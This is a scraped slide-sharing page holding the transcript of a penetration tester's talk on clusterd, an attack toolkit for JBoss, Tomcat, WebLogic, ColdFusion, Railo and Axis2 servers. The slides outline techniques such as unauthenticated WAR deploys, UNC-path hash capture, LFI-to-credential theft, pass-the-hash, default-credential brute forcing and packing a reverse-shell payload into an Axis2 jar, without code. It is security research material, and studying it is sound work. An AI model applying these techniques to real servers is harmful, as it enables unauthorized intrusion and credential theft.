Presentation is loading. Please wait.

Presentation is loading. Please wait.

Clusterd: app server security Bryan Alexander. who Coalfire Labs Independent researcher Breaking via building.

Published byMyrtle Reed Modified over 9 years ago

Similar presentations

Presentation on theme: "Clusterd: app server security Bryan Alexander. who Coalfire Labs Independent researcher Breaking via building."— Presentation transcript:

1 clusterd: app server security Bryan Alexander

2 who pentester @ Coalfire Labs Independent researcher Breaking via building

3 why?

4 ColdFusion 10 deployments? JRun hash retrieval? WebLogic anythings? Running versions? Jboss 7.x/8.x deploys? Brute forcing? Railo? Axis2? WebSphere?! More!?

5 what clusterd; application server attack toolkit Python-based, command line driven Support for Jboss, WebLogic, Tomcat, Coldfusion, Railo, …

6 what JBoss Tomcat WebLogic ColdFusion Railo Axis2

7 JBoss So much has already been said (Matasano, Red Team Pentesting, HSC) Let's talk about things that haven't been

8 Jboss Recap Versions 3.x – 7.x “Jboss” Versions 8.x+ rebranded to “WildFly” Make it rain shells with WARs No security by default clusterd currently features 7 unique deployers Typically run as an administrative/SYSTEM user

9 Jboss Recap

10 Jboss 7.x One interface to rule them all (JSON API) They still haven't figured out how authentication works Unauthenticated deploys via exposed management interface

11 Jboss UNC Not a new attack, but a new application Force JBoss to load a remote resource via a UNC path, capture hashes, crack 'em

12 Jboss CVE-2005-2006 Nobody is using this bug to fetch credentials

13 Jboss Auxiliary Auxiliary modules used for scraping remote information

14 Tomcat Recap Tomcat 3.x – 8.x; very consistent platform Default creds! Roles! manager vs. manager-gui clusterd currently deploys to everything

15 Tomcat Not much going on; all the standard modules

16 WebLogic Oracle's very own Jboss/Tomcat (still Java) Very enterprise-y; clustering, systematic backups, etc Difficult to obtain older versions (which have default creds)

17 WebLogic WebLogic supports deploying WAR files, and so does clusterd You have to use the java/jsp_shell_*_tcp payloads (default in clusterd)

18 WebLogic Two versions of the admin interface; http and https (ports 7001 and 9002) Typically run as a system service Clustered environment, deploys can trickle down a domain Very often seen in high-availability environments, ie. systems running active/active

19 Coldfusion Recap Coldfusion 6.x – 11.x clusterd currently has three deployers for CF LFI leading to hash disclosure v6.x – 10.x No cracking when you can PTH No default credentials, but plenty of ways to get around that

20 Coldfusion

21 Everybody knows the task scheduler can be used to deploy 10.x+ restricts the extension (no cfml)

22 Coldfusion How about LFI to RCE?

23 Railo Railo 3.x – 4.x Essentially just a FOSS Coldfusion Task scheduler, plugin architecture, clustered servers, lots of development By default very promiscuous

24 Railo No public vulnerabilities, yet... Two interfaces; server.cfm and web.cfm Runs jsp and cfml, much like CF

25 Axis2 Axis2 1.2 – 1.6 Web services (soap/wsdl) engine; deploy services not applications Couple ways to deploy; clusterd currently supports one (recently added) Default creds! Last release was 2012, but still heavily used

26 Axis2 Generating payloads is pretty simple, but we can't use vanilla msfpayload Generate a java/meterpreter/reverse_tcp and pack it into a jar; build XML descriptor

27 Axis2 LFI in 1.4.x, obviously we're going to fetch creds

28 other features All platforms support brute forcing via supplied wordlist

29 other features Clean up after yourselves; every platform has an undeployer

30 other features Discovery module

31 other features Maybe demo?

32 FOSSy Well formed pull requests welcome  https://github.com/hatRiot/clusterd https://github.com/hatRiot/clusterd Public to-do hosted on Trello  https://trello.com/b/Bwcmrsyd/clusterd https://trello.com/b/Bwcmrsyd/clusterd Research and 0days and fun stuff on my blog  http://hatriot.github.io/ http://hatriot.github.io/ Twat or email me your questions/bugs/requests  @dronesec (bryan.alexander@coalfire.com)

33 Questions¿ Comments?

Download ppt "Clusterd: app server security Bryan Alexander. who Coalfire Labs Independent researcher Breaking via building."

Similar presentations

The Professional Open Source Company Agent & PDK JBossNetwork Enterprise Manager.

The Professional Open Source Company Agent & PDK JBossNetwork Enterprise Manager.
12 October 2011 Andrew Brown IMu Technology EMu Global Users Group 12 October 2011 IMu Technology.

12 October 2011 Andrew Brown IMu Technology EMu Global Users Group 12 October 2011 IMu Technology.
Welcome to Middleware Joseph Amrithraj

Welcome to Middleware Joseph Amrithraj
Web Toolkit Julie George & Ronald Lopez 1. Requirements  Java SDK version 1.5 or later  Apache Ant is also necessary to run command line arguments 

Web Toolkit Julie George & Ronald Lopez 1. Requirements  Java SDK version 1.5 or later  Apache Ant is also necessary to run command line arguments 
CF and JSP/Servlets Developed originally by Robi Sen For the CF UnderGround II Seminar, Apr 2001 Edited and enhanced by Charlie Arehart (Robi had an emergency.

CF and JSP/Servlets Developed originally by Robi Sen For the CF UnderGround II Seminar, Apr 2001 Edited and enhanced by Charlie Arehart (Robi had an emergency.
METALOGIC s o f t w a r e © Metalogic Software Corporation 2004-2006 DACS Developer Overview DACS – the Distributed Access Control System.

METALOGIC s o f t w a r e © Metalogic Software Corporation DACS Developer Overview DACS – the Distributed Access Control System.
Developing in CAS. Why? As distributed you edit CAS 3 with Eclipse and build with Maven 2 – Best Practice for Release Engineering – Difficult edit-debug.

Developing in CAS. Why? As distributed you edit CAS 3 with Eclipse and build with Maven 2 – Best Practice for Release Engineering – Difficult edit-debug.
1 G2 and ActiveSheets Paul Roe QUT Yes Australia!

1 G2 and ActiveSheets Paul Roe QUT Yes Australia!
A Blackboard Building Block™ Crash Course for Web Developers

A Blackboard Building Block™ Crash Course for Web Developers
Web Services Web Services are the basic fundamental building blocks of invoking features that can be accessed by an application program. The accessibility.

Web Services Web Services are the basic fundamental building blocks of invoking features that can be accessed by an application program. The accessibility.
CSF4, SGE and Gfarm Integration Zhaohui Ding Jilin University.

CSF4, SGE and Gfarm Integration Zhaohui Ding Jilin University.
AHRT: The Automated Human Resources Tool BY Roi Ceren Muthukumaran Chandrasekaran.

AHRT: The Automated Human Resources Tool BY Roi Ceren Muthukumaran Chandrasekaran.
REST support for B2B access to your AppServer PUG Challenge Americas - 2014 Michael Jacobs : Senior Software Architect Edsel Garcia : Principal Software.

REST support for B2B access to your AppServer PUG Challenge Americas Michael Jacobs : Senior Software Architect Edsel Garcia : Principal Software.
6/2/2015Page 1 SOA Development and Deployment B. Ramamurthy.

6/2/2015Page 1 SOA Development and Deployment B. Ramamurthy.
1 CENTER FOR PARALLEL COMPUTERS An Introduction to Globus Toolkit® 3 -Developing Interoperable Grid services.

1 CENTER FOR PARALLEL COMPUTERS An Introduction to Globus Toolkit® 3 -Developing Interoperable Grid services.
Next Generation Node (NGN) Technical Overview April 2007.

Next Generation Node (NGN) Technical Overview April 2007.
Advanced Java Class Web Applications – Part 0 (Introduction)

Advanced Java Class Web Applications – Part 0 (Introduction)
Building and Deploying a Simple Web Application. Tomcat and JSP Tomcat is an application server, commonly used to host JSP applications Applications are.

Building and Deploying a Simple Web Application. Tomcat and JSP Tomcat is an application server, commonly used to host JSP applications Applications are.
Session-01. What is a Servlet? Servlet can be described in many ways, depending on the context: 1.Servlet is a technology i.e. used to create web application.

Session-01. What is a Servlet? Servlet can be described in many ways, depending on the context: 1.Servlet is a technology i.e. used to create web application.
IIS 7: The Next Generation Web Application Server Platform Michael Volodarsky Program Manager Web Platform and Tools Team Microsoft Corporation.

IIS 7: The Next Generation Web Application Server Platform Michael Volodarsky Program Manager Web Platform and Tools Team Microsoft Corporation.

Similar presentations

Ads by Google